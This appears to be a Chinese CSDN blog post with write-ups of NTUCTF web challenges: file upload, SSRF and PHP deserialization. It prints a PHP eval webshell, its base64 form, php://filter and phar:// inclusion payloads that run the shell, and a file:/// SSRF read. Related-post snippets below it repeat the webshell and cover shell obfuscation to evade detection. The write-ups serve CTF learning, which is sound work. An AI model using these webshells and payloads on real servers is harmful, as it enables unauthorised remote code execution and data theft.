NTUCTF总结

最新推荐文章于 2023-03-20 09:35:41 发布
最新推荐文章于 2023-03-20 09:35:41 发布
阅读量1.5k 收藏 1
点赞数 3
文章标签: ctf
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/103331235
版权

uploud

第一次做文件上传这类题,大概知道了这类题是怎么做的。
在这里插入图片描述
这道题有两种方法:

一,base64加密解密绕过:

1,把一句话木马base64加密

<?php @eval($_POST['pass']); ?>

PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pOyA/Pg==  //base64加密后。

2,将base64加密后的密文保存到 ok.txt 里。

在这里插入图片描述
3,上传
在这里插入图片描述
4,连接蚁剑
payload:
index.php?file=php://filter/read=convert.base64-decode/resource=uploads/ok.txt

5,在根目录下找到flag。
在这里插入图片描述
二,加密绕过:
1,将一句话木马写入 ok.txt 中
在这里插入图片描述2,将 OK.txt 加密为 OK.zip 压缩文件。
在这里插入图片描述
3,上传该文件
在这里插入图片描述
4,链接蚁剑。

payload:
index.php?file=phar://uploads/ok.zip/ok.php
在这里插入图片描述这里要用到 phar:// 协议,记录一下,以后可能要用到。

ssrf

1,进去以后是这样的:
在这里插入图片描述2,查看源代码。
在这里插入图片描述
3,用 file协议得到flag

index.php?url=file:///flag.txt

在这里插入图片描述

web_ser

1,打开是这样的:
在这里插入图片描述 2,分析源码可得满足if语句的条件就可以得到flag,这里的关键是unserialize()函数。

天问_Herbert555
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
流量分析_安恒八月月赛
Lemon's blog
07-09 3967
前言: 流量分析很有意思,之前忙于考试,暂时没有学习了,考试结束了就来总结一下一些CTF下常见的流量分析的题型。 0x00:流量包修复 使用wireshark打开流量包发现报错,可以使用
BugKu~二手交易市场:文件上传漏洞+一句话木马
xhxtalent的博客
10-20 1339
看到图片类型是jpeg,并且还有base64的加密,我们把一句话木马进行base64的加密并且修改文件类型为php再上传。上传成功,并且返回文件路径,将原始路径+/Uploads/heads/75f940ada20db345.php。到处随便点点看看,有没有什么疑似可以利用的地方。那么上传用户头像,有没有想到上传一个图片马的想法呢!很好我们已经连上了后台,在后台文件里查找一下flag吧。flag也出来了,这次的文件上传也就结束了。打开网站可以看到是一个类似于淘宝商城的页面。引入眼帘的是上传用户头像。
NTUCTF
weixin_45664911的博客
11-03 195
可惜不是你 下载文件后发现是一个音频,百度搜索ctf杂项音频,发现是音频隐写。 跟着教程解出flag(https://blog.csdn.net/myloveprogrmming/article/details/52641916) 遭难了吗 ...
NTUCTF web——admin
weixin_45664911的博客
11-26 397
admin 打开网页,看到右上角,注册一个账号并登录。 查看源代码 “你不是管理者!” 那就去注册一个name为管理者的账号,发现是成功不了的 GitHub是用于版本控制和协作的代码托管平台。它使您和其他人可以在任何地方共同处理项目。 这题有使用到github,可以参考文章(https://www.runoob.com/w3cnote/git-guide.html) github使用教程:h...
UNCTF2022wp
weixin_52780973的博客
11-21 1023
unctf2022wp web、密码学Crypto、Misc、Reverse 比赛
CTFshow web 文件包含
m0_56993542的博客
10-18 385
web 78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 文件包含伪协议,没有过滤。 ?file=php://filter/read=convert.base64-encode/resource=flag.php 拿到flag的base64编码,直接去解码。 web 79 if(isset($_GET['file'])){
一句话木马简介
qq_41272376的博客
02-15 6939
一句话木马简介 一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8274
ThinkPHP5系列远程代码执行漏洞复现(详细)
ctfshow web入门(文件包含)
qq_53263789的博客
07-19 660
ctfshow
代码审计php文件包含,php代码审计之文件包含
weixin_29711471的博客
04-01 291
文件包含文件包含分为本地文件包含(Local File Inclusion,简LFI)和远程文件包含(Remote File Inclusion,简RFI)。在php中常见的文件包含函数有:当php包含一个文件时不会在意文件的类型,都会把文件当做php文件来解析。(file_get_contents()除外)。本地文件包含测试代码:存在本地文件包含漏洞。%00截断条件:playload:这时就是本...
五大后门连接工具&木马免杀初级思路
weixin_54882883的博客
08-25 1117
在我们上传木马的时候,经常会遇到木马查杀,木马上传上去了突然被杀了删除了,有时候木马上传了,但是连不上去,这是在getshell中经常遇到的问题,那么当遇到这种问题,就需要让木马绕过网站上WAF的一些查杀等等问题了。那么这个时候POST还需将我们要执行的代码命令等等进去传送给assert函数。但是eval不能直接在URL中添加所以用assert来代替。其实assert和eval的功能上是差不多。检测机制检测就是未知代码不知道。为什么e=assert呢。那么这个地址就是后门地址。加密其实就是把木马加密了。..
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
NJUST CTF 2018 Writeup
qq_37820590的博客
03-17 2106
NJUST CTF 2018 Writeup Supernova, Nanjing Universityfrostwing98,Trap,Arcadia MISC1 签到by Arcadia一路调戏ai之后(误)可以得到一串base64编码的字符串,在线解码得到flagMISC2 GIFby frostwing98下载到gif,发现是不断闪烁的黑/白画面,第一考虑是莫尔斯电码。首先http://tu
NTUCTF web——upload
weixin_45664911的博客
11-17 451
upload 打开后发现需要上传php文件,而上传文件后却发生错误。
180317 逆向-DragonQuest(NUST)
whklhhhh的博客
04-03 371
1625-5 王子昂 总结《2018年3月17日》 【连续第532天总结】 A. nust南理校赛 DragonQuest B. 解压得到exe和dll 顺手拖入IDA,发现是.NET程序 dnspy打开发现主程序加壳了,查了一下壳无果 exeinfoPE还推荐我用RL!dePacker和QuickUnpack这两个万能脱壳机,坑爹呢这是~我还以为它觉得能脱呢,折腾了半小时研究怎么用...
BUUCTF misc 解题记录 一(超级详细)
qq_51090016的博客
03-16 1万+
持续更新一些不会的题目,有错误的还请大佬指点N种方法解决 N种方法解决 附件下载是一个exe文件,我还运行不了。。这咋办 改成txt文件看看 好像有什么东西藏在里面 前面有个jpg 还有base,用winhex打开看看 到这没思路了,看wp base64可以表示图片 这个让我这个菜鸡人傻了 转换网站点这 转换完还能帮你另存为,真不错 扫一下就OK了 ...
CTF之加解密总结
weixin_33816821的博客
08-01 465
CTF之加解密总结 0x01 Base64 Base64顾名思义就是用64个可显示字符表示所有的ASC字符,64也就是6Bits,而ASC字符一共有256个,也就是8Bits。Base64编码要求把3个8位字节(38=24)转化为4个6位的字节(46=24),之后在6位的前面补两个0,形成8位一个字节的形式。 如果剩下的字符不足3个字节,则用0填充,输出字符使用’=’,因此编码后输出的文本末尾可能...
攻防世界-Web_php_include
Nothing-one的博客
07-28 80
这个考察的是文件包含。 通过data://text/plain协议来进行漏洞利用 这个我直接用了蚁剑进行了连接, 将<?php @eval($_POST['pass']) ?>转化为base64、PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pID8+Cgo= 然后我门http://111.200.241.244:63659/?page=data://text/plain/;base64,PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ10pID8
数据分析的核心技能和方法
最新发布
07-19
数据分析的核心技能和方法
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包
07-19
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 平湖人寿保险公司保险销售网站分为用户和管理员两个部分 前台部分(用户界面): 1、资讯浏览功能: (1)新闻资讯浏览 (2)新闻资讯查询 (3)公司简介 (4)通知公告 2、用户登录注册功能: (1)注册 (2)登录 3、用户管理功能 (1)个人信息管理 (2)订单管理 4、保险购买功能: (1)保险产品浏览 (2)保险产品查询 (3)保险产品购买 后台管理(管理员界面) 1、管理员登录功能: 管理员在管理员登录界面输入用户名和密码,即可登录管理员的界面。 2、资讯管理功能: (1)新闻资讯管理 (2)公司简介管理 (3)通知公告管理 3、保险产品管理: (1)保险产品信息管理 (2)保险产品查询 4、会员管理: (1)会员删除 (2)会员级别管理 5、统计管理: (1)保险产品销售量统计 (2)有效会员数量统计 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值